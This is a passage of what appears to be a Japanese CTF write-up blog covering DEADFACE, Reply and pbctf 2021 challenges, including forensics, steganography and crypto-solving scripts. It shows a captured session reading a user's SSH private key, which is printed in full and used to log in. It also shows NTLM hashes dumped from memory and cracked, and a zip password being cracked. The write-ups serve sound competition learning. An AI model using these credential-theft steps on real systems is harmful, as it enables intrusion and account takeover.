00002c80: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c90: 2020 2020 2020 0a20 2020 2020 2020 2020        .         
00002ca0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002cb0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002cc0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002cd0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002ce0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002cf0: 2020 2020 2020 2020 2020 200a 2020 2020             .    
00002d00: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d10: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d20: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d30: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d40: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d50: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d60: 0a20 2020 2020 2020 2020 2020 2020 2020  .               
00002d70: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d80: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002d90: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002da0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002db0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002dc0: 2020 2020 200a 2020 2020 2020 2020 2020       .          
00002dd0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002de0: 200a 3c3f 7870 6163 6b65 7420 656e 643d   .<?xpacket end=
00002df0: 2277 223f 3e0d 0a65 6e64 7374 7265 616d  "w"?>..endstream
00002e00: 0d65 6e64 6f62 6a0d 3320 3020 6f62 6a0d  .endobj.3 0 obj.
00002e10: 3c3c 2f46 696c 7465 722f 466c 6174 6544  <</Filter/FlateD
00002e20: 6563 6f64 652f 4669 7273 7420 342f 4c65  ecode/First 4/Le
00002e30: 6e67 7468 2034 392f 4e20 312f 5479 7065  ngth 49/N 1/Type
00002e40: 2f4f 626a 5374 6d3e 3e73 7472 6561 6d0d  /ObjStm>>stream.
00002e50: 0a68 deb2 5430 50b0 b1d1 77ce 2fcd 2b51  .h..T0P...w./.+Q
00002e60: 30d4 f7ce 4c29 8e36 3406 0a06 c5ea 8754  0...L).64......T
00002e70: 16a4 ea07 24a6 a716 dbd9 0104 1800 e035  ....$..........5
00002e80: 0baf 0d0a 656e 6473 7472 6561 6d0d 656e  ....endstream.en
00002e90: 646f 626a 0d34 2030 206f 626a 0d3c 3c2f  dobj.4 0 obj.<</
00002ea0: 4669 6c74 6572 2f46 6c61 7465 4465 636f  Filter/FlateDeco
00002eb0: 6465 2f46 6972 7374 2035 2f4c 656e 6774  de/First 5/Lengt
00002ec0: 6820 3132 342f 4e20 312f 5479 7065 2f4f  h 124/N 1/Type/O
00002ed0: 626a 5374 6d3e 3e73 7472 6561 6d0d 0a68  bjStm>>stream..h
00002ee0: de94 ccb1 0ac2 3014 46e1 57b9 5b93 a1ed  ......0.F.W.[...
00002ef0: 9fab 97aa 9442 6956 c107 e892 3419 baf4  .....BiV....4...
00002f00: 4288 efaf 20b8 38b9 9ff3 3910 681c fba5  B... .8...9.h...
00002f10: e450 773d 7ca8 d9f8 1b83 1d06 3730 4418  .Pw=|.......70D.
00002f20: 2da4 011a fba9 b498 3969 cc34 6f45 63a8  -.......9i.4oEc.
00002f30: f428 4a7e a1d5 9cb8 8d7b 5d2d b1eb a463  .(J~.....{]-...c
00002f40: 402e b6bf 6bfa 45af 7cfe a2ef 3d3d b7fc  @...k.E.|...==..
00002f50: 973a 4d2f 0106 0025 b931 ab0d 0a65 6e64  .:M/...%.1...end
00002f60: 7374 7265 616d 0d65 6e64 6f62 6a0d 3520  stream.endobj.5 
00002f70: 3020 6f62 6a0d 3c3c 2f44 6563 6f64 6550  0 obj.<</DecodeP
00002f80: 6172 6d73 3c3c 2f43 6f6c 756d 6e73 2034  arms<</Columns 4
00002f90: 2f50 7265 6469 6374 6f72 2031 323e 3e2f  /Predictor 12>>/
00002fa0: 4669 6c74 6572 2f46 6c61 7465 4465 636f  Filter/FlateDeco
00002fb0: 6465 2f49 445b 3c30 3246 3335 3839 3933  de/ID[<02F358993
00002fc0: 4331 4431 3434 4538 4346 3644 3246 3241  C1D144E8CF6D2F2A
00002fd0: 3237 3941 4334 463e 3c31 4542 3246 4231  279AC4F><1EB2FB1
00002fe0: 3932 3931 4443 4434 4439 3833 3937 3731  9291DCD4D9839771
00002ff0: 3539 4339 4137 3539 363e 5d2f 496e 666f  59C9A7596>]/Info
00003000: 2031 3020 3020 522f 4c65 6e67 7468 2034   10 0 R/Length 4
00003010: 382f 526f 6f74 2031 3220 3020 522f 5369  8/Root 12 0 R/Si
00003020: 7a65 2031 312f 5479 7065 2f58 5265 662f  ze 11/Type/XRef/
00003030: 575b 3120 3220 315d 3e3e 7374 7265 616d  W[1 2 1]>>stream
00003040: 0d0a 68de 6262 0002 2646 8528 0626 06c6  ..h.bb..&F.(.&..
00003050: 3b40 82f7 1290 60e8 0571 6f02 252e 4e06  ;@....`..qo.%.N.
00003060: 7119 1861 04d3 3f20 c1c8 0010 6000 ac4c  q..a..? ....`..L
00003070: 061d 0d0a 656e 6473 7472 6561 6d0d 656e  ....endstream.en
00003080: 646f 626a 0d73 7461 7274 7872 6566 0d0a  dobj.startxref..
00003090: 3131 360d 0a25 2545 4f46 0d0a            116..%%EOF..

これをhexdataに保存する。

$ cat hexdata | xxd -r > De\ Monne\ Customer\ Portal.pdf

このPDFにフラグが書いてあった。
f:id:satou-y:20211021231724p:plain

flag{deM0nn3_dat4_4_us}

File 101 (Forensics 200)

jpgの後にURLが書いてある。

https://www.dropbox.com/s/io1kaqznal2c10y/corrupted.zip?dl=0

ここからパスワード付きzipのcorrupted.zipをダウンロードし、zipのパスワードクラックを実行する。

$ fcrackzip -u -D -p dict/rockyou.txt corrupted.zip 


PASSWORD FOUND!!!!: pw == pumpkinpie
$ unzip -P pumpkinpie corrupted.zip 
Archive:  corrupted.zip
  inflating: FOR0x.png

FOR0x.pngファイルをバイナリエディタで見ると、実体はjpgの方が近い上に、ヘッダ部が壊れているので修正する。

・最初の4バイトは FF D8 FF E0に変更
・"jfif" → "JFIF"に変更

この画像の右下にフラグが書いてあった。
f:id:satou-y:20211021231939j:plain

flag{Easy_Right}

Not So Complicated (Exploitation 10)

$ volatility -f physmemraw --profile=Win10x64_19041 hivelist
Volatility Foundation Volatility Framework 2.6.1
Virtual            Physical           Name
------------------ ------------------ ----

Volatiltiy version 2だとこのOSバージョンのhivelistが取れないので、version 3を使う。

$ python3 vol.py -f ../work/physmemraw windows.hashdump.Hashdump
Volatility 3 Framework 2.0.0
Progress:  100.00		PDB scanning finished                        
User	rid	lmhash	nthash

Administrator	500	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
Guest	501	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount	503	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount	504	aad3b435b51404eeaad3b435b51404ee	0b51f04cf2a0d8f6f4469cd628a78776
Jimmie	1001	aad3b435b51404eeaad3b435b51404ee	0d757ad173d2fc249ce19364fd64c8ec
Admin	1003	aad3b435b51404eeaad3b435b51404ee	29b0d58e146d70278c29dc70f74f1e5d

JimmieのパスワードのNTLMハッシュ"0d757ad173d2fc249ce19364fd64c8ec"をCrackStationでクラックする。

flag{qwertyuiop}

The Root of All Evil... OR... Adding Insult to Injury (Exploitation 300)

sshのkeyがあるかを調べてみたら、以下のTCP Streamを見つけた。

whoami
root

echo "Stay away from Lytton Labs... you have been warned.  Dark Angel" > /da.txt
chmod 600 /da.txt
ls -al /
total 80
drwxr-xr-x  18 root root  4096 Aug 22 18:00 .
drwxr-xr-x  18 root root  4096 Aug 22 18:00 ..
lrwxrwxrwx   1 root root     7 Aug 21 20:19 bin -> usr/bin
drwxr-xr-x   3 root root  4096 Aug 21 20:35 boot
-rw-------   1 root root    64 Aug 22 18:00 da.txt
drwxr-xr-x  18 root root  3180 Aug 22 17:21 dev
drwxr-xr-x 167 root root 12288 Aug 22 17:21 etc
drwxr-xr-x   4 root root  4096 Aug 21 20:29 home
lrwxrwxrwx   1 root root    34 Aug 21 20:34 initrd.img -> boot/initrd.img-5.10.0-kali9-amd64
lrwxrwxrwx   1 root root    34 Aug 21 20:19 initrd.img.old -> boot/initrd.img-5.10.0-kali7-amd64
lrwxrwxrwx   1 root root     7 Aug 21 20:19 lib -> usr/lib
lrwxrwxrwx   1 root root     9 Aug 21 20:19 lib32 -> usr/lib32
lrwxrwxrwx   1 root root     9 Aug 21 20:19 lib64 -> usr/lib64
lrwxrwxrwx   1 root root    10 Aug 21 20:19 libx32 -> usr/libx32
drwx------   2 root root 16384 Aug 21 20:19 lost+found
drwxr-xr-x   3 root root  4096 May 28 03:26 media
drwxr-xr-x   2 root root  4096 May 28 03:26 mnt
drwxr-xr-x   3 root root  4096 Aug 21 20:19 opt
dr-xr-xr-x 199 root root     0 Aug 22 17:21 proc
drwx------   6 root root  4096 Aug 22 07:59 root
drwxr-xr-x  36 root root   900 Aug 22 17:21 run
lrwxrwxrwx   1 root root     8 Aug 21 20:19 sbin -> usr/sbin
drwxr-xr-x   3 root root  4096 Aug 21 20:19 srv
dr-xr-xr-x  13 root root     0 Aug 22 17:21 sys
drwxrwxrwt  14 root root  4096 Aug 22 17:50 tmp
drwxr-xr-x  14 root root  4096 Aug 21 20:23 usr
drwxr-xr-x  12 root root  4096 Aug 21 20:23 var
lrwxrwxrwx   1 root root    31 Aug 21 20:34 vmlinuz -> boot/vmlinuz-5.10.0-kali9-amd64
lrwxrwxrwx   1 root root    31 Aug 21 20:23 vmlinuz.old -> boot/vmlinuz-5.10.0-kali7-amd64
cat da.txt
cat: da.txt: No such file or directory
cat /da.txt
Stay away from Lytton Labs... you have been warned.  Dark Angel

cat /home/luciafer/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

id_rsaをエクスポートし、PEM形式に変換して、SSH接続する。

$ cp id_rsa id_rsa.pem
$ ssh-keygen -p -m pem -f id_rsa.pem
Key has comment 'luciafer@dungeon'
Enter new passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved with the new passphrase.
$ ssh -i id_rsa.pem luciafer@batescafe.deadface.io
The authenticity of host 'batescafe.deadface.io (164.90.158.159)' can't be established.
ECDSA key fingerprint is SHA256:n2x0TCmZ4LxU0LLlQ0jkx/Uin/f3mSFLjKPR15n0zC0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'batescafe.deadface.io' (ECDSA) to the list of known hosts.
luciafer@abee273c2782:~$ ls
Documents  Downloads  Music  Pictures  Videos
luciafer@abee273c2782:~$ ls -lRa
.:
total 40
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 root     root     4096 Oct 10 02:45 ..
-rw-r--r-- 1 luciafer luciafer  220 Oct 10 02:45 .bash_logout
-rw-r--r-- 1 luciafer luciafer 3771 Oct 10 02:45 .bashrc
-rw-r--r-- 1 luciafer luciafer  807 Oct 10 02:45 .profile
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 Documents
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:46 Downloads
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 Music
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 Pictures
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 Videos

./Documents:
total 8
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..

./Downloads:
total 12
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:46 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..
-rw-rw-r-- 1 luciafer luciafer   49 Oct 10 02:45 flag.txt

./Music:
total 8
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..

./Pictures:
total 8
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..

./Videos:
total 8
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..
luciafer@abee273c2782:~$ cat ./Downloads/flag.txt
flag{Lucy-a-FUR-G0T-R3KT-by-the-BLUZers-CLUB!!!}

flag{Lucy-a-FUR-G0T-R3KT-by-the-BLUZers-CLUB!!!}

Scary Bunny (Steganography 10)

パスワードなしでsteghideを実行する。

$ steghide extract -sf bunny.jpg 
Enter passphrase: 
wrote extracted data to "steganopayload730241.txt".
$ cat steganopayload730241.txt 
flag{Carr0t}

flag{Carr0t}

Behind the Curtain (Steganography 30)

$ binwalk steg01.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
30            0x1E            TIFF image data, big-endian, offset of first image directory: 8
13266         0x33D2          JPEG image data, JFIF standard 1.01
13296         0x33F0          TIFF image data, big-endian, offset of first image directory: 8

jpgの後ろにjpgが付いているので、切り出す。この切り出したjpg画像にフラグが書いてあった。
f:id:satou-y:20211021232450j:plain

flag{L3t_m3_in}

V0icE (Steganography 50)

Audacityで開き、スペクトログラムを見ると、フラグが見えた。
f:id:satou-y:20211021232552p:plain

flag{1257}

Big Boss (Cryptography 10)

フィッシングのターゲットの名前を答える必要がある。写真にはこう書いてある。

Hvs bslh asshwbu kwzz ps hcrom oh bccb. Bssr hc twbr cih
Xwaaws'g kcfy gqvsrizs gc ks ybck kvsb wg psgh hc dvwgv
vwa. Hvs qoadowub bssrg hc zccy zwys wh qoas tfca
vwg pcgg, Aofqig Pmbsf, Vs kcfyg og ob Orjobqsr
Gczihwxbg Gidsfjwgcf - rcb'h tcfush hc wbqzirs
hvoh wb hvs saowz.

これをquipqiupにかける。

The next meeting will be today at noon. Need to find out Jimmie's work schedule so we know when is best to phish him. The campaign needs to look like it came from his boss, Marcus Byner, He works as an Advanced Solutijns Supervisor - don't forget to include that in the email.
flag{Marcus_Byner}

Poor MEGAN! (Cryptography 20)

問題タイトルから考えると、暗号はMEGAN-35。http://qbarbe.free.fr/crypto/eng_megan35d.phpで復号する。

flag{Six-Parts-Honey-One-Part-Garlic}

To Be Xor Not to Be (Cryptography 75)

暗号はXORを推測できる。フラグは"f"から始めることを前提に鍵を求め復号する。

enc = ".$)/3<'e-)<e':e&'<e<'e-)<5"

key = ord('f') ^ ord(enc[0])

flag = ''
for c in enc:
    flag += chr(ord(c) ^ key)
print flag

flag{to-eat-or-not-to-eat}

A(n) [ENCRYPTED] by Any Other Name (Cryptography 100)

使用しているブロック暗号のモードはECBモード。暗号アルゴリズムはECBモードを持っている暗号。鍵が必要だが、わからない。
https://ghosttown.deadface.io/t/hint-for-mort1cia/47にヒントらしきものが書いてあった。

暗号アルゴリズムはパスワードの同音異義語
パスワードは Spook, Spectre, Spirit, Phantasm の同義語

ここから暗号アルゴリズムはGOST、パスワードはghostと推測する。https://www.tools4noobs.com/online_tools/decrypt/で以下を指定して復号する。

鍵:ghost
Algorithm: GOST
Mode: ECB
Decode the input using: Base64

復号結果は以下の通り。

The hack on Lytton Labs is going down at 11:59 PM, October 31, 2021.  Be ready with the custom ransomware.  We will upload it to their servers and unleash it in a scripted, coordinated attack!  Make sure to have at least five other hackers assist you with this.  thezealot is coordinating this operation.

flag{the-USSR-is-the-GOST-with-the-MOST}
flag{the-USSR-is-the-GOST-with-the-MOST}

He Thrusts His Fists Against the Post (Cryptography 100)

Rail Fence Cipher。"flag{"から始まるように組んでみる。
f:id:satou-y:20211021233307p:plain

flag{and-yet-swears-he-observes-the-phantasms}

Reply Cyber Security Challenge 2021 Writeup

CTF writeup

この大会は2021/10/9 9:00(JST)~2021/10/11 9:00(JST)に開催されました。
今回もチームで参戦。結果は900点で2247チーム中115位でした。
自分で解けた問題をWriteupとして書いておきます。

Too much sharing (CRYPTO 100)

RSA暗号と思われる。c, n, phiがわかっている。eの値は以下のようになっている。

e = int(str(p)[:32]) + (str(q)[:32])
素数になるまで1プラスする。

phiとn、p、qの関係は以下のようになる。

phi = (p - 1) * (q - 1) = n - (p + q) + 1
p + q = n - phi + 1

ここからは二次方程式を解けば、pとqはわかる。p, qがわかれば、eも算出できる。あとは通常通り復号すればよい。

#!/usr/bin/python3
from Crypto.Util.number import *
from sympy import *

with open('crypto100-readme.txt', 'r') as f:
    Claire = int(f.readline().rstrip().split(' ')[-1])
    Nathan = int(f.readline().rstrip().split(' ')[-1])
    Philip = int(f.readline().rstrip().split(' ')[-1])

p_q = Nathan - Philip + 1

p = symbols('p')
eq = Eq(p * (p_q - p), Nathan)
ps = solve(eq)
Portia = ps[0]
Quincy = ps[1]
assert(Portia * Quincy == Nathan)

Edgard = int(str(Portia)[0:32])+int(str(Quincy)[0:32])
while not isPrime(Edgard):
    Edgard += 1
d = inverse(Edgard, Philip)
m = pow(Claire, d, Nathan)
flag = long_to_bytes(m).decode()
print(flag)

{FLG:Cha0s_h1d3s_b3h1nd_th3_m3n4c1ng_f4c3_0f_0rd3r!}

What an Enigma! (CRYPTO 200)

エニグマ暗号で、M4 Sharkであるようだ。まず順にhelpを解き、パラメータを取得する。
first helpでは、モールス信号をデコードする。

GURCBFVGVBAFNAQEVATFLBHARRQNERS21Y18G16T11

さらにROT13をかける。

THEPOSITIONSANDRINGSYOUNEEDAREF21L18T16G11
→THE POSITIONS AND RINGS YOU NEED ARE F21 L18 T16 G11

second helpでは、表からワードを消し込む。

NH CW MK PO ZS QB FU TR

他のパラメータはブルートフォースで復号する。

from enigma.machine import EnigmaMachine
import itertools

ciphertext = 'utogaaxgeonuvkegegddajktikdtvepnkolokj'
rotors = ['Beta', 'Gamma', 'I', 'II', 'III', 'IV', 'V', 'VI', 'VII', 'VIII']
reflectors = ['B', 'C', 'B-Thin', 'C-Thin']

found = False
for rotor in itertools.product(rotors, repeat=4):
    for reflector in reflectors:
        machine = EnigmaMachine.from_key_sheet(
            rotors = rotor,
            reflector = reflector,
            ring_settings = (20, 17, 15, 10),
            plugboard_settings='NH CW MK PO ZS QB FU TR')
        machine.set_display('FLTG')
        plaintext = machine.process_text(ciphertext.upper())
        flag = plaintext.lower()
        if flag.startswith('flg'):
            found = True
            print flag
            break
    if found:
        break

実行結果は以下の通り。

flgthematrixhasyoufollowthewhiterabbit
{FLG:thematrixhasyoufollowthewhiterabbit}

pbctf 2021 Writeup

CTF writeup

この大会は2021/10/9 9:00(JST)~2021/10/11 9:00(JST)に開催されました。
今回もチームで参戦。結果は 134点で210チーム中201位でした。
自分で解けた問題をWriteupとして書いておきます。

Alkaloid Stream (Crypto)

暗号の処理概要は以下の通り。

・flag: flagを2進数表記
・key = keygen(len(flag))
・keystream, public = gen_keystream(key)
 ※len(key)=600の場合
 ・i=0, j=0, fake[0] ^= key[1]
 ・i=0, j=1, fake[0] ^= key[2]
      :
 ・i=0, j=199, fake[0] ^= key[200]
 ・i=1, j=0, fake[1] ^= key[2]
 ・i=1, j=1, fake[1] ^= key[3]
      :
 ・i=1, j=199, fake[1] ^= key[201]
      :
 ・i=398, j=0, fake[398] ^= key[399]
      :
 ・i=399, j=199, fake[399] ^= key[598]
 ・i=399, j=0, fake[399] ^= key[400]
      :
 ・i=399, j=199, fake[399] ^= key[599]
 ・i=597, j=0, fake[597] ^= key[598]
 ・i=597, j=1, fake[597] ^= key[599]
 ・i=598, j=0, fake[598] ^= key[599]

このことから以下のように算出し、fakeとkeyを求めることができる。

fake[599] = 0 -> key[599] = ペアの数値
fake[598] = key[599] -> key[598] = ペアの数値
fake[597] = key[598] ^ key[599] -> key[597] = ペアの数値
fake[596] = key[597] ^ key[598] ^ key[599] -> key[596] = ペアの数値
      :

fakeとkeyを求めたら、keystreamを算出し、暗号文とXORをとればフラグになる。

#!/usr/bin/python3
import copy

def xor(a, b):
    return [x ^ y for x, y in zip(a, b)]

def recover_keystream(key, public):
    st = set(key)
    keystream = []
    for v0, v1 in public:
        if v0 in st:
            keystream.append(0)
        elif v1 in st:
            keystream.append(1)
        else:
            assert False, "Failed to recover the keystream"
    return keystream

def bytes_to_bits(inp):
    res = []
    for v in inp:
        res.extend(list(map(int, format(v, '08b'))))
    return res

def bits_to_bytes(inp):
    res = []
    for i in range(0, len(inp), 8):
        res.append(int(''.join(map(str, inp[i:i+8])), 2))
    return bytes(res)

with open('output.txt', 'r') as f:
    enc = bytes.fromhex(f.readline().rstrip())
    public = eval(f.readline().rstrip())

ln = len(public)

key = [0] * ln
fake = [0] * ln
tmp_pub = copy.copy(public)

for i in range(ln - 1, -1, -1):
    for p in tmp_pub:
        if p[0] == fake[i]:
            key[i] = p[1]
            if i > 0:
                for j in range(ln // 3):
                    if i + j >= ln:
                        break
                    fake[i-1] ^= key[i + j]
            tmp_pub.remove([p[0], p[1]])
            break
        if p[1] == fake[i]:
            key[i] = p[0]
            if i > 0:
                for j in range(ln // 3):
                    if i + j >= ln:
                        break
                    fake[i-1] ^= key[i + j]
            tmp_pub.remove([p[0], p[1]])
            break

keystream = recover_keystream(key, public)

enc = bytes_to_bits(enc)
flag = bits_to_bytes(xor(enc, keystream)).decode()
print(flag)

pbctf{super_duper_easy_brute_forcing_actually_this_one_was_made_by_mistake}